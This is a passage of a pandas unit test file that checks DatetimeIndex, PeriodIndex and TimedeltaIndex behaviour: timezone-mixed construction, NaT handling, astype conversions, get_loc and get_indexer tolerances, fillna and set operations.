Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
exp = Index([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
# length = 1
result = Index([Timestamp('2011-01-01')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# length = 1 with tz
result = Index(
[Timestamp('2011-01-01 10:00', tz='Asia/Tokyo')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00')], tz='Asia/Tokyo',
name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
def test_construction_index_with_mixed_timezones_with_NaT(self):
# GH 11488
result = Index([pd.NaT, Timestamp('2011-01-01'),
pd.NaT, Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex([pd.NaT, Timestamp('2011-01-01'),
pd.NaT, Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# same tz results in DatetimeIndex
result = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00')],
tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# same tz results in DatetimeIndex (DST)
result = Index([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
pd.NaT,
Timestamp('2011-08-01 10:00', tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'), pd.NaT,
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
# different tz results in Index(dtype=object)
result = Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='US/Eastern')],
name='idx')
exp = Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
result = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00',
tz='US/Eastern')], name='idx')
exp = Index([pd.NaT, Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
dtype='object', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertFalse(isinstance(result, DatetimeIndex))
# all NaT
result = Index([pd.NaT, pd.NaT], name='idx')
exp = DatetimeIndex([pd.NaT, pd.NaT], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNone(result.tz)
# all NaT with tz
result = Index([pd.NaT, pd.NaT], tz='Asia/Tokyo', name='idx')
exp = DatetimeIndex([pd.NaT, pd.NaT], tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
self.assertIsNotNone(result.tz)
self.assertEqual(result.tz, exp.tz)
def test_construction_dti_with_mixed_timezones(self):
# GH 11488 (not changed, added explicit tests)
# no tz results in DatetimeIndex
result = DatetimeIndex(
[Timestamp('2011-01-01'), Timestamp('2011-01-02')], name='idx')
exp = DatetimeIndex(
[Timestamp('2011-01-01'), Timestamp('2011-01-02')], name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# same tz results in DatetimeIndex
result = DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00',
tz='Asia/Tokyo')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00')],
tz='Asia/Tokyo', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# same tz results in DatetimeIndex (DST)
result = DatetimeIndex([Timestamp('2011-01-01 10:00', tz='US/Eastern'),
Timestamp('2011-08-01 10:00',
tz='US/Eastern')],
name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-08-01 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
        # different tz coerces tz-naive to tz-aware DatetimeIndex
result = DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00',
tz='US/Eastern')], name='idx')
exp = DatetimeIndex([Timestamp('2011-01-01 05:00'),
Timestamp('2011-01-02 10:00')],
tz='US/Eastern', name='idx')
self.assert_index_equal(result, exp, exact=True)
self.assertTrue(isinstance(result, DatetimeIndex))
# tz mismatch affecting to tz-aware raises TypeError/ValueError
with tm.assertRaises(ValueError):
DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
name='idx')
with tm.assertRaisesRegexp(TypeError, 'data is already tz-aware'):
DatetimeIndex([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='Asia/Tokyo', name='idx')
with tm.assertRaises(ValueError):
DatetimeIndex([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='US/Eastern', name='idx')
with tm.assertRaisesRegexp(TypeError, 'data is already tz-aware'):
# passing tz should results in DatetimeIndex, then mismatch raises
# TypeError
Index([pd.NaT, Timestamp('2011-01-01 10:00'),
pd.NaT, Timestamp('2011-01-02 10:00', tz='US/Eastern')],
tz='Asia/Tokyo', name='idx')
def test_construction_base_constructor(self):
arr = [pd.Timestamp('2011-01-01'), pd.NaT, pd.Timestamp('2011-01-03')]
tm.assert_index_equal(pd.Index(arr), pd.DatetimeIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.DatetimeIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Timestamp('2011-01-03')]
tm.assert_index_equal(pd.Index(arr), pd.DatetimeIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.DatetimeIndex(np.array(arr)))
def test_construction_outofbounds(self):
# GH 13663
dates = [datetime(3000, 1, 1), datetime(4000, 1, 1),
datetime(5000, 1, 1), datetime(6000, 1, 1)]
exp = Index(dates, dtype=object)
# coerces to object
tm.assert_index_equal(Index(dates), exp)
with tm.assertRaises(OutOfBoundsDatetime):
# can't create DatetimeIndex
DatetimeIndex(dates)
def test_construction_with_ndarray(self):
# GH 5152
dates = [datetime(2013, 10, 7),
datetime(2013, 10, 8),
datetime(2013, 10, 9)]
data = DatetimeIndex(dates, freq=pd.tseries.frequencies.BDay()).values
result = DatetimeIndex(data, freq=pd.tseries.frequencies.BDay())
expected = DatetimeIndex(['2013-10-07',
'2013-10-08',
'2013-10-09'],
freq='B')
tm.assert_index_equal(result, expected)
def test_astype(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype(object)
expected = Index([Timestamp('2016-05-16')] + [NaT] * 3, dtype=object)
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([1463356800000000000] +
[-9223372036854775808] * 3, dtype=np.int64)
tm.assert_index_equal(result, expected)
rng = date_range('1/1/2000', periods=10)
result = rng.astype('i8')
self.assert_index_equal(result, Index(rng.asi8))
self.assert_numpy_array_equal(result.values, rng.asi8)
def test_astype_with_tz(self):
# with tz
rng = date_range('1/1/2000', periods=10, tz='US/Eastern')
result = rng.astype('datetime64[ns]')
expected = (date_range('1/1/2000', periods=10,
tz='US/Eastern')
.tz_convert('UTC').tz_localize(None))
tm.assert_index_equal(result, expected)
# BUG#10442 : testing astype(str) is correct for Series/DatetimeIndex
result = pd.Series(pd.date_range('2012-01-01', periods=3)).astype(str)
expected = pd.Series(
['2012-01-01', '2012-01-02', '2012-01-03'], dtype=object)
tm.assert_series_equal(result, expected)
result = Series(pd.date_range('2012-01-01', periods=3,
tz='US/Eastern')).astype(str)
expected = Series(['2012-01-01 00:00:00-05:00',
'2012-01-02 00:00:00-05:00',
'2012-01-03 00:00:00-05:00'],
dtype=object)
tm.assert_series_equal(result, expected)
def test_astype_str_compat(self):
# GH 13149, GH 13209
        # verify that we are returning NaT as a string (and not unicode)
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype(str)
expected = Index(['2016-05-16', 'NaT', 'NaT', 'NaT'], dtype=object)
tm.assert_index_equal(result, expected)
def test_astype_str(self):
# test astype string - #10442
result = date_range('2012-01-01', periods=4,
name='test_name').astype(str)
expected = Index(['2012-01-01', '2012-01-02', '2012-01-03',
'2012-01-04'], name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with tz and name
result = date_range('2012-01-01', periods=3, name='test_name',
tz='US/Eastern').astype(str)
expected = Index(['2012-01-01 00:00:00-05:00',
'2012-01-02 00:00:00-05:00',
'2012-01-03 00:00:00-05:00'],
name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with freqH and name
result = date_range('1/1/2011', periods=3, freq='H',
name='test_name').astype(str)
expected = Index(['2011-01-01 00:00:00', '2011-01-01 01:00:00',
'2011-01-01 02:00:00'],
name='test_name', dtype=object)
tm.assert_index_equal(result, expected)
# test astype string with freqH and timezone
result = date_range('3/6/2012 00:00', periods=2, freq='H',
tz='Europe/London', name='test_name').astype(str)
expected = Index(['2012-03-06 00:00:00+00:00',
'2012-03-06 01:00:00+00:00'],
dtype=object, name='test_name')
tm.assert_index_equal(result, expected)
def test_astype_datetime64(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
result = idx.astype('datetime64[ns]')
tm.assert_index_equal(result, idx)
self.assertFalse(result is idx)
result = idx.astype('datetime64[ns]', copy=False)
tm.assert_index_equal(result, idx)
self.assertTrue(result is idx)
idx_tz = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN], tz='EST')
result = idx_tz.astype('datetime64[ns]')
expected = DatetimeIndex(['2016-05-16 05:00:00', 'NaT', 'NaT', 'NaT'],
dtype='datetime64[ns]')
tm.assert_index_equal(result, expected)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = DatetimeIndex(['2016-05-16', 'NaT', NaT, np.NaN])
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, 'timedelta64')
self.assertRaises(ValueError, idx.astype, 'timedelta64[ns]')
self.assertRaises(ValueError, idx.astype, 'datetime64')
self.assertRaises(ValueError, idx.astype, 'datetime64[D]')
def test_where_other(self):
# other is ndarray or Index
i = pd.date_range('20130101', periods=3, tz='US/Eastern')
for arr in [np.nan, pd.NaT]:
result = i.where(notnull(i), other=np.nan)
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2), i2)
tm.assert_index_equal(result, i2)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2), i2.values)
tm.assert_index_equal(result, i2)
def test_where_tz(self):
i = pd.date_range('20130101', periods=3, tz='US/Eastern')
result = i.where(notnull(i))
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = Index([pd.NaT, pd.NaT] + i[2:].tolist())
result = i.where(notnull(i2))
expected = i2
tm.assert_index_equal(result, expected)
def test_get_loc(self):
idx = pd.date_range('2000-01-01', periods=3)
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(idx.get_loc(idx[1].to_pydatetime(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
if method is not None:
self.assertEqual(idx.get_loc(idx[1], method,
tolerance=pd.Timedelta('0 days')),
1)
self.assertEqual(idx.get_loc('2000-01-01', method='nearest'), 0)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest'), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance='1 day'), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=pd.Timedelta('1D')), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=np.timedelta64(1, 'D')), 1)
self.assertEqual(idx.get_loc('2000-01-01T12', method='nearest',
tolerance=timedelta(1)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc('2000-01-01T12', method='nearest', tolerance='foo')
with tm.assertRaises(KeyError):
idx.get_loc('2000-01-01T03', method='nearest', tolerance='2 hours')
self.assertEqual(idx.get_loc('2000', method='nearest'), slice(0, 3))
self.assertEqual(idx.get_loc('2000-01', method='nearest'), slice(0, 3))
self.assertEqual(idx.get_loc('1999', method='nearest'), 0)
self.assertEqual(idx.get_loc('2001', method='nearest'), 2)
with tm.assertRaises(KeyError):
idx.get_loc('1999', method='pad')
with tm.assertRaises(KeyError):
idx.get_loc('2001', method='backfill')
with tm.assertRaises(KeyError):
idx.get_loc('foobar')
with tm.assertRaises(TypeError):
idx.get_loc(slice(2))
idx = pd.to_datetime(['2000-01-01', '2000-01-04'])
self.assertEqual(idx.get_loc('2000-01-02', method='nearest'), 0)
self.assertEqual(idx.get_loc('2000-01-03', method='nearest'), 1)
self.assertEqual(idx.get_loc('2000-01', method='nearest'), slice(0, 2))
# time indexing
idx = pd.date_range('2000-01-01', periods=24, freq='H')
tm.assert_numpy_array_equal(idx.get_loc(time(12)),
np.array([12]), check_dtype=False)
tm.assert_numpy_array_equal(idx.get_loc(time(12, 30)),
np.array([]), check_dtype=False)
with tm.assertRaises(NotImplementedError):
idx.get_loc(time(12, 30), method='pad')
def test_get_indexer(self):
idx = pd.date_range('2000-01-01', periods=3)
exp = np.array([0, 1, 2], dtype=np.intp)
tm.assert_numpy_array_equal(idx.get_indexer(idx), exp)
target = idx[0] + pd.to_timedelta(['-1 hour', '12 hours',
'1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
tm.assert_numpy_array_equal(
idx.get_indexer(target, 'nearest',
tolerance=pd.Timedelta('1 hour')),
np.array([0, -1, 1], dtype=np.intp))
with tm.assertRaises(ValueError):
idx.get_indexer(idx[[0]], method='nearest', tolerance='foo')
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range('20130101', periods=3, tz='US/Eastern', name='foo')
unpickled = self.round_trip_pickle(index)
self.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range('20130101', periods=3, tz='US/Eastern')
self.assertEqual(str(index.reindex([])[0].tz), 'US/Eastern')
self.assertEqual(str(index.reindex(np.array([]))[0].tz), 'US/Eastern')
def test_time_loc(self): # GH8667
from datetime import time
from pandas.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range('2014-11-26', periods=n, freq='S')
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i,
check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start='2000', periods=periods, freq='S')
self.assertEqual(len(idx1), periods)
idx2 = pd.date_range(end='2000', periods=periods, freq='S')
self.assertEqual(len(idx2), periods)
def test_intersection(self):
first = self.index
second = self.index[5:]
intersect = first.intersection(second)
self.assertTrue(tm.equalContents(intersect, second))
# GH 10149
cases = [klass(second.values) for klass in [np.array, Series, list]]
for case in cases:
result = first.intersection(case)
self.assertTrue(tm.equalContents(result, second))
third = Index(['a', 'b', 'c'])
result = first.intersection(third)
expected = pd.Index([], dtype=object)
self.assert_index_equal(result, expected)
def test_union(self):
first = self.index[:5]
second = self.index[5:]
everything = self.index
union = first.union(second)
self.assertTrue(tm.equalContents(union, everything))
# GH 10149
cases = [klass(second.values) for klass in [np.array, Series, list]]
for case in cases:
result = first.union(case)
self.assertTrue(tm.equalContents(result, everything))
def test_nat(self):
self.assertIs(DatetimeIndex([np.nan])[0], pd.NaT)
def test_ufunc_coercions(self):
idx = date_range('2011-01-01', periods=3, freq='2D', name='x')
delta = np.timedelta64(1, 'D')
for result in [idx + delta, np.add(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = date_range('2011-01-02', periods=3, freq='2D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '2D')
for result in [idx - delta, np.subtract(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = date_range('2010-12-31', periods=3, freq='2D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '2D')
delta = np.array([np.timedelta64(1, 'D'), np.timedelta64(2, 'D'),
np.timedelta64(3, 'D')])
for result in [idx + delta, np.add(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = DatetimeIndex(['2011-01-02', '2011-01-05', '2011-01-08'],
freq='3D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '3D')
for result in [idx - delta, np.subtract(idx, delta)]:
tm.assertIsInstance(result, DatetimeIndex)
exp = DatetimeIndex(['2010-12-31', '2011-01-01', '2011-01-02'],
freq='D', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, 'D')
def test_fillna_datetime64(self):
# GH 11343
for tz in ['US/Eastern', 'Asia/Tokyo']:
idx = pd.DatetimeIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'])
exp = pd.DatetimeIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'])
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00')), exp)
# tz mismatch
exp = pd.Index([pd.Timestamp('2011-01-01 09:00'),
pd.Timestamp('2011-01-01 10:00', tz=tz),
pd.Timestamp('2011-01-01 11:00')], dtype=object)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00', tz=tz)), exp)
# object
exp = pd.Index([pd.Timestamp('2011-01-01 09:00'), 'x',
pd.Timestamp('2011-01-01 11:00')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
idx = pd.DatetimeIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'], tz=tz)
exp = pd.DatetimeIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'], tz=tz)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00', tz=tz)), exp)
exp = pd.Index([pd.Timestamp('2011-01-01 09:00', tz=tz),
pd.Timestamp('2011-01-01 10:00'),
pd.Timestamp('2011-01-01 11:00', tz=tz)],
dtype=object)
self.assert_index_equal(
idx.fillna(pd.Timestamp('2011-01-01 10:00')), exp)
# object
exp = pd.Index([pd.Timestamp('2011-01-01 09:00', tz=tz),
'x',
pd.Timestamp('2011-01-01 11:00', tz=tz)],
dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
def test_difference_freq(self):
# GH14323: difference of DatetimeIndex should not preserve frequency
index = date_range("20160920", "20160925", freq="D")
other = date_range("20160921", "20160924", freq="D")
expected = DatetimeIndex(["20160920", "20160925"], freq=None)
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = date_range("20160922", "20160925", freq="D")
idx_diff = index.difference(other)
expected = DatetimeIndex(["20160920", "20160921"], freq=None)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq='WOM-1SAT')
dates = ['2013-01-05', '2013-02-02', '2013-03-02', '2013-04-06']
expected = DatetimeIndex(dates, freq='WOM-1SAT')
tm.assert_index_equal(result, expected)
class TestPeriodIndex(DatetimeLike, tm.TestCase):
_holder = PeriodIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makePeriodIndex(10))
self.setup_indices()
def create_index(self):
return period_range('20130101', periods=5, freq='D')
def test_construction_base_constructor(self):
# GH 13664
arr = [pd.Period('2011-01', freq='M'), pd.NaT,
pd.Period('2011-03', freq='M')]
tm.assert_index_equal(pd.Index(arr), pd.PeriodIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.PeriodIndex(np.array(arr)))
arr = [np.nan, pd.NaT, pd.Period('2011-03', freq='M')]
tm.assert_index_equal(pd.Index(arr), pd.PeriodIndex(arr))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.PeriodIndex(np.array(arr)))
arr = [pd.Period('2011-01', freq='M'), pd.NaT,
pd.Period('2011-03', freq='D')]
tm.assert_index_equal(pd.Index(arr), pd.Index(arr, dtype=object))
tm.assert_index_equal(pd.Index(np.array(arr)),
pd.Index(np.array(arr), dtype=object))
def test_astype(self):
# GH 13149, GH 13209
idx = PeriodIndex(['2016-05-16', 'NaT', NaT, np.NaN], freq='D')
result = idx.astype(object)
expected = Index([Period('2016-05-16', freq='D')] +
[Period(NaT, freq='D')] * 3, dtype='object')
tm.assert_index_equal(result, expected)
result = idx.astype(int)
expected = Int64Index([16937] + [-9223372036854775808] * 3,
dtype=np.int64)
tm.assert_index_equal(result, expected)
idx = period_range('1990', '2009', freq='A')
result = idx.astype('i8')
self.assert_index_equal(result, Index(idx.asi8))
self.assert_numpy_array_equal(result.values, idx.asi8)
def test_astype_raises(self):
# GH 13149, GH 13209
idx = PeriodIndex(['2016-05-16', 'NaT', NaT, np.NaN], freq='D')
self.assertRaises(ValueError, idx.astype, str)
self.assertRaises(ValueError, idx.astype, float)
self.assertRaises(ValueError, idx.astype, 'timedelta64')
self.assertRaises(ValueError, idx.astype, 'timedelta64[ns]')
def test_shift(self):
# test shift for PeriodIndex
# GH8083
drange = self.create_index()
result = drange.shift(1)
expected = PeriodIndex(['2013-01-02', '2013-01-03', '2013-01-04',
'2013-01-05', '2013-01-06'], freq='D')
self.assert_index_equal(result, expected)
def test_pickle_compat_construction(self):
pass
def test_get_loc(self):
idx = pd.period_range('2000-01-01', periods=3)
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(
idx.get_loc(idx[1].asfreq('H', how='start'), method), 1)
self.assertEqual(idx.get_loc(idx[1].to_timestamp(), method), 1)
self.assertEqual(
idx.get_loc(idx[1].to_timestamp().to_pydatetime(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
idx = pd.period_range('2000-01-01', periods=5)[::2]
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance='1 day'), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=pd.Timedelta('1D')), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=np.timedelta64(1, 'D')), 1)
self.assertEqual(idx.get_loc('2000-01-02T12', method='nearest',
tolerance=timedelta(1)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc('2000-01-10', method='nearest', tolerance='foo')
msg = 'Input has different freq from PeriodIndex\\(freq=D\\)'
with tm.assertRaisesRegexp(ValueError, msg):
idx.get_loc('2000-01-10', method='nearest', tolerance='1 hour')
with tm.assertRaises(KeyError):
idx.get_loc('2000-01-10', method='nearest', tolerance='1 day')
def test_where(self):
i = self.create_index()
result = i.where(notnull(i))
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2))
expected = i2
tm.assert_index_equal(result, expected)
def test_where_other(self):
i = self.create_index()
for arr in [np.nan, pd.NaT]:
result = i.where(notnull(i), other=np.nan)
expected = i
tm.assert_index_equal(result, expected)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2), i2)
tm.assert_index_equal(result, i2)
i2 = i.copy()
i2 = pd.PeriodIndex([pd.NaT, pd.NaT] + i[2:].tolist(),
freq='D')
result = i.where(notnull(i2), i2.values)
tm.assert_index_equal(result, i2)
def test_get_indexer(self):
idx = pd.period_range('2000-01-01', periods=3).asfreq('H', how='start')
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.PeriodIndex(['1999-12-31T23', '2000-01-01T12',
'2000-01-02T01'], freq='H')
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest',
tolerance='1 hour'),
np.array([0, -1, 1], dtype=np.intp))
msg = 'Input has different freq from PeriodIndex\\(freq=H\\)'
with self.assertRaisesRegexp(ValueError, msg):
idx.get_indexer(target, 'nearest', tolerance='1 minute')
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest',
tolerance='1 day'),
np.array([0, 1, 1], dtype=np.intp))
def test_repeat(self):
# GH10183
idx = pd.period_range('2000-01-01', periods=3, freq='D')
res = idx.repeat(3)
exp = PeriodIndex(idx.values.repeat(3), freq='D')
self.assert_index_equal(res, exp)
self.assertEqual(res.freqstr, 'D')
def test_period_index_indexer(self):
# GH4125
idx = pd.period_range('2002-01', '2003-12', freq='M')
df = pd.DataFrame(pd.np.random.randn(24, 10), index=idx)
self.assert_frame_equal(df, df.ix[idx])
self.assert_frame_equal(df, df.ix[list(idx)])
self.assert_frame_equal(df, df.loc[list(idx)])
self.assert_frame_equal(df.iloc[0:5], df.loc[idx[0:5]])
self.assert_frame_equal(df, df.loc[list(idx)])
def test_fillna_period(self):
# GH 11343
idx = pd.PeriodIndex(['2011-01-01 09:00', pd.NaT,
'2011-01-01 11:00'], freq='H')
exp = pd.PeriodIndex(['2011-01-01 09:00', '2011-01-01 10:00',
'2011-01-01 11:00'], freq='H')
self.assert_index_equal(
idx.fillna(pd.Period('2011-01-01 10:00', freq='H')), exp)
exp = pd.Index([pd.Period('2011-01-01 09:00', freq='H'), 'x',
pd.Period('2011-01-01 11:00', freq='H')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
exp = pd.Index([pd.Period('2011-01-01 09:00', freq='H'),
pd.Period('2011-01-01', freq='D'),
pd.Period('2011-01-01 11:00', freq='H')], dtype=object)
self.assert_index_equal(idx.fillna(pd.Period('2011-01-01', freq='D')),
exp)
def test_no_millisecond_field(self):
with self.assertRaises(AttributeError):
DatetimeIndex.millisecond
with self.assertRaises(AttributeError):
DatetimeIndex([]).millisecond
def test_difference_freq(self):
# GH14323: difference of Period MUST preserve frequency
# but the ability to union results must be preserved
index = period_range("20160920", "20160925", freq="D")
other = period_range("20160921", "20160924", freq="D")
expected = PeriodIndex(["20160920", "20160925"], freq='D')
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = period_range("20160922", "20160925", freq="D")
idx_diff = index.difference(other)
expected = PeriodIndex(["20160920", "20160921"], freq='D')
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
class TestTimedeltaIndex(DatetimeLike, tm.TestCase):
_holder = TimedeltaIndex
_multiprocess_can_split_ = True
def setUp(self):
self.indices = dict(index=tm.makeTimedeltaIndex(10))
self.setup_indices()
def create_index(self):
return pd.to_timedelta(range(5), unit='d') + pd.offsets.Hour(1)
